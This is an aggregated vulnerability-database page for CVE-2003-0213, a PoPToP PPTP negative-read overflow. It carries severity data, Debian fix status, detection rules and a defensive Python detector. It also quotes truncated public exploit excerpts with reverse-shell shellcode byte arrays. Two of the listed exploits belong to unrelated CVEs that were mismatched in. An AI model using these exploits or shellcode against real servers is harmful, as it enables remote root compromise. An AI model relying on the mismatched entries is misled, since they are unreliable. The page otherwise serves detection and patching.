CVE-2003-0213
Published 2003-05-12
Priority: P349 (high) · CVSS 2.0: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available
EPSS: 71.03% (99.3rd percentile)
ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative value to be fed into a read operation, leading to a buffer overflow.
Affected (7 ranges; the poptop/pptp_server entries carry no version data)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | pptpd | < pptpd 1.1.4-0.b3.2 (bookworm) | pptpd 1.1.4-0.b3.2 (bookworm) |
| poptop | pptp_server | — | — |
Detection & IOCs (extracted from sources)

Bytes: \x1a\x2b\x3c\x4d (PPTP magic cookie)
- Detect PPTP control connection packets (port 1723/TCP) where the PPTP length field in the header is set to 0 or 1, which is anomalous and triggers the negative read overflow in ctrlpacket.c.
- Alert on PPTP ECHO_RQST (ctrl_type=5) packets on TCP/1723 where the declared packet length field is 1 (ntohs value), as this is the specific trigger used by all known exploits for this CVE.
- Fingerprint vulnerable PoPToP servers by sending a valid START_CTRL_CONN_RQST (length=156) and checking if the response banner contains the string 'MoretonBay', which indicates a vulnerable version.
- Monitor for PPTP packets on TCP/1723 containing the magic cookie 0x1a2b3c4d followed by an anomalously small length field (0 or 1) in the PPTP header, indicating an exploitation attempt.
- Bruteforce exploitation attempts will generate many rapid sequential TCP connections to port 1723, each sending an ECHO_RQST with length=1 followed by a large payload buffer (~500 bytes of NOP sled + shellcode + return addresses).
- The Metasploit exploit uses bruteforce RET address scanning between 0xbffff000 and 0xbffffa00 with step 0, meaning detection based on a single connection attempt may miss the attack; monitoring for repeated connections is necessary.
- The exploit author notes that Poptop version detection is not reliable, so version-based blocking alone is insufficient; traffic-level detection on the malformed length field is required.
- The vulnerable server by default allows only 4 concurrent manager processes, limiting the maximum number of simultaneous shells an attacker can obtain, but this does not prevent exploitation.
- The shellcode in exploit EDB-19 embeds the attacker's IP and port directly in the payload bytes (at fixed offsets), meaning the shellcode bytes will vary per attacker; byte-signature detection should focus on the invariant NOP sled and syscall sequences rather than the full shellcode.
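A detector for the header anomaly described in the rules above, written as an added example for this entry (it is not code from any of the indexed sources). It parses the fixed PPTP control-message header from RFC 2637 (Length, PPTP Message Type, Magic Cookie, Control Message Type, Reserved0; all big-endian), checks for the 0x1a2b3c4d cookie, and flags a declared Length of 0 or 1. A second rule, which is my generalisation and not from the sources, flags any Length smaller than the 12-byte header, since Length counts the whole message including the header. The sample packets (a 156-byte START_CTRL_CONN_RQST and bare ECHO_RQST headers with no payload) are constructed inline, and the constant and function names are mine.

```python
"""Flag PPTP control-connection messages whose declared Length is impossibly small.

Added example for CVE-2003-0213; not code from the indexed sources.
RFC 2637 fixed control-message header (12 bytes, all fields big-endian):
  Length(2) | PPTP Message Type(2) | Magic Cookie(4) | Control Message Type(2) | Reserved0(2)
"""
import struct

PPTP_PORT = 1723
MAGIC_COOKIE = 0x1A2B3C4D      # on the wire: \x1a\x2b\x3c\x4d
HEADER_LEN = 12                # size of the fixed header above
CTRL_MESSAGE = 1               # PPTP Message Type: control message
START_CTRL_CONN_RQST = 1       # Control Message Type values from RFC 2637
ECHO_RQST = 5
HEADER = struct.Struct("!HHIHH")


def parse_header(payload: bytes):
    """Return the header fields as a dict, or None if the payload is too short to hold one."""
    if len(payload) < HEADER_LEN:
        return None
    length, msg_type, cookie, ctrl_type, _reserved = HEADER.unpack_from(payload)
    return {"length": length, "msg_type": msg_type, "cookie": cookie, "ctrl_type": ctrl_type}


def classify(payload: bytes) -> str:
    """Classify one TCP segment payload observed on port 1723."""
    hdr = parse_header(payload)
    if hdr is None:
        return "short"
    if hdr["cookie"] != MAGIC_COOKIE:
        return "not-pptp"
    if hdr["length"] in (0, 1):
        # The trigger named for CVE-2003-0213: the server derives the number of
        # bytes still to read from this field and ends up with a negative count.
        return "cve-2003-0213-trigger"
    if hdr["length"] < HEADER_LEN:
        # Generalisation (assumption, not from the advisory): a Length shorter
        # than the fixed header can never describe a valid message.
        return "malformed-length"
    return "ok"


def build_ctrl(length: int, ctrl_type: int, body: bytes = b"") -> bytes:
    """Construct a control message with an explicit Length field (test data only)."""
    return HEADER.pack(length, CTRL_MESSAGE, MAGIC_COOKIE, ctrl_type, 0) + body


# Constructed sample traffic: (description, payload). The 156-byte request is the
# well-formed START_CTRL_CONN_RQST size; the ECHO_RQST samples carry no payload.
SAMPLES = [
    ("benign start-control-connection request", build_ctrl(156, START_CTRL_CONN_RQST, bytes(144))),
    ("echo request with length=1", build_ctrl(1, ECHO_RQST)),
    ("echo request with length=0", build_ctrl(0, ECHO_RQST)),
    ("length 8, below header size", build_ctrl(8, ECHO_RQST)),
    ("non-PPTP bytes on the port", b"GET / HTTP/1.0\r\n\r\n"),
]


def scan(samples=SAMPLES):
    """Run the classifier over a list of (description, payload) pairs."""
    return [(desc, classify(payload)) for desc, payload in samples]


if __name__ == "__main__":
    for desc, verdict in scan():
        print(f"{verdict:24} {desc}")
```

The check keys on the Length field rather than on shellcode bytes, which matches the note above that payload bytes vary per attacker while the malformed header does not; pairing it with a per-source connection-rate count on port 1723 covers the repeated-connection pattern of the bruteforce modules.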
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | HIGH | — |
Debian
CVE-2003-0213: pptpd
vendor_debian · 2003 · CVSS 7.5 · HIGH
Scope: local
bookworm: resolved (fixed in 1.1.4-0.b3.2)
bullseye: resolved (fixed in 1.1.4-0.b3.2)
forky: resolved (fixed in 1.1.4-0.b3.2)
sid: resolved (fixed in 1.1.4-0.b3.2)
trixie: resolved (fixed in 1.1.4-0.b3.2)
GHSA
GHSA-84m7-68fc-v7c9: ctrlpacket
ghsa_unreviewed · 2022-04-29 · HIGH
OSV
CVE-2003-0213: ctrlpacket
osv · 2003-05-12 · CVSS 7.5 · HIGH
No detection rules found.
Exploit-DB
Microsoft Exchange 2003 - base64-MIME Remote Code Execution
exploitdb · 2019-07-05 · CVE-2007-0213

```python
# Python 2.7 (included with ImmunityDBG)
# Exchange 2003 SP0 base64-MIME memory corruption
# NSA's `ENGLISHMANSDENTIST`
# Platform: Windows Server 2003 R2
# Shout out to the Equation Group, NSA Tailored Access Operations
# Author: Charles Truscott @r0ss1n1
# Shout out to Offensive Security, from Australia with Love
import time
import socket
import base64
import struct
#payload ="eJ8+InlpAQaQCAAEAAAAAAABAAEAAgKQBgAOAAAAAAAAAAAAAAAAAAAAAAAAAAIFkAYAevwAAAEA" + "\r\n"
#payload+="AAANAAE3AQAAAGr8AAALAAAAAAAAAMAAAAAAAABG0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAD" + "\r\n"
#payload+="AP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAEAAA/v///wAAAAD+////AAAAAAAAAAD/////" + "\r\n"
#payload+="//////////////////////////////////////////////////////
```
Exploit-DB
PoPToP - Negative Read Overflow (Metasploit)
exploitdb · 2010-11-23 · CVE-2003-0213

```ruby
##
# $Id: poptop_negative_read.rb 11114 2010-11-23 18:12:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # The rank, mixin and initialize lines between the class line and 'Name'
  # were lost in extraction; the class header below follows the standard
  # Metasploit 3 module layout.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Poptop Negative Read Overflow',
      'Description' => %q{
        This is an exploit for the Poptop negative read overflow. This will
        work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
        currently do not have a good way to detect Poptop versions.
        The server will by default only allow 4 concurrent manager processes
        (what we run our code in), so you could have a max of 4 shells
```
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb · 2004-07-17 · CVE-2004-0213

```c
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
 *
 * Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
 *
 * Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
 *
 * 2004/07/16
 *
 * thanks to eyas xfocus org
 *
 *
 C:\>whoami
 VITUALWIN2K\test
 C:\>posixexp
 Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
 By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
 pax: illegal option--h
 Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
        pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
        pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
            [-t device] [-x format] [pathname...]
        pax -r -w [-ilmopuvy] [
```
Exploit-DB
PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution
exploitdb · 2003-04-25 · CVE-2003-0213

```c
/*
 * Fixed Exploit against PoPToP in Linux (poptop-sane.c)
 * ./r4nc0rwh0r3 of blightninjas ([email protected])
 *
 * blightninjas: bringing pain, suffering, and humiliation to the security world
 * Expect more great release like helloworld-annotated.c and
 * cd explained whitepaper, we are working hard in da underground
 *
 * Other Editions Available At:
 * http://www.freewebs.com/blightninjas/
 *
 * *** Bugtraq Clean Edition ***
 * Based off of code by [email protected]
 *
 * Notes on the exploit:
 * This was only tested under slackware, RET_OFF could possibly
 * be different.
 * You can have nulls in the shellcode (the hole is in a read())
 * This allows you to have ips and ports with nulls in them
 *
 * Shouts to ADM, TESO
```
Exploit-DB
PoPToP PPTP 1.1.4-b3 - Remote Command Execution
exploitdb · 2003-04-18 · CVE-2003-0213

```c
/*
 * exploit for a recently discovered vulnerability in PoPToP
 * PPTP server under Linux. Versions affected are all prior to
 * 1.1.4-b3 and 1.1.3-20030409.
 * The exploit is capable of bruteforcing the RET address to find our
 * buffer in the stack. Upon a successfull run it brings up a reverse
 * shell with privileges of the pptpd daemon (typically root)
 * on the victim server.
 */
#include
#include
#include
#define u_int8_t char
#define u_int16_t WORD
#define u_int32_t DWORD
char shellcode[] =
"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b"
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a"
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d"
"\x01\x01" // port
"\x54\xd6\x63"
"\x01\x01\x01\x01" // ip a
```
Exploit-DB
PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow
exploitdb · 2003-04-09 · CVE-2003-0213

Source: https://www.securityfocus.com/bid/7316/info

A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory.

Successful exploits of this issue may allow attackers to execute arbitrary code with the privileges of the affected server.

```c
#include
#include
#include
#include
#include
/* Ported to Linux by John Leach */
typedef int SOCKET;
typedef unsigned short WORD;
typedef unsigned int DWORD;
char shellcode[] =
"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x
```
Exploit-DB
PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit)
exploitdb · 2003-04-09 · CVE-2003-0213

```ruby
      # The class header and the lines preceding 'Name' were lost in
      # extraction (the module's "<" in "class ... < Msf::Exploit::Remote"
      # was read as markup); the listing resumes at the info hash.
      'Name'        => 'Poptop Negative Read Overflow',
      'Description' => %q{
        This is an exploit for the Poptop negative read overflow. This will
        work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
        currently do not have a good way to detect Poptop versions.
        The server will by default only allow 4 concurrent manager processes
        (what we run our code in), so you could have a max of 4 shells at once.
        Using the current method of exploitation, our socket will be closed
        before we have the ability to run code, preventing the use of Findsock.
      },
      'Author'      => 'spoonm',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision$',
      'References'  =>
        [
          ['CVE', '2003-0213'],
          ['OSVDB', '3293'],
          ['URL', 'http://securityfocus.com/archive/1/317995'],
          ['URL', 'http://www.freewebs.com/blightninjas/'],
        ],
      'Privileged'  => tr
```
Metasploit
Poptop Negative Read Overflow
metasploit

This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. The server will by default only allow 4 concurrent manager processes (what we run our code in), so you could have a max of 4 shells at once. Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock.
No writeups or analysis indexed.
References

- http://marc.info/?l=bugtraq&m=105068728421160&w=2
- http://marc.info/?l=bugtraq&m=105154539727967&w=2
- http://sourceforge.net/project/shownotes.php?release_id=138437
- http://www.debian.org/security/2003/dsa-295
- http://www.kb.cert.org/vuls/id/673993
- http://www.novell.com/linux/security/advisories/2003_029.html
- http://www.securityfocus.com/archive/1/317995
- http://www.securityfocus.com/archive/1/319428
- http://www.securityfocus.com/bid/7316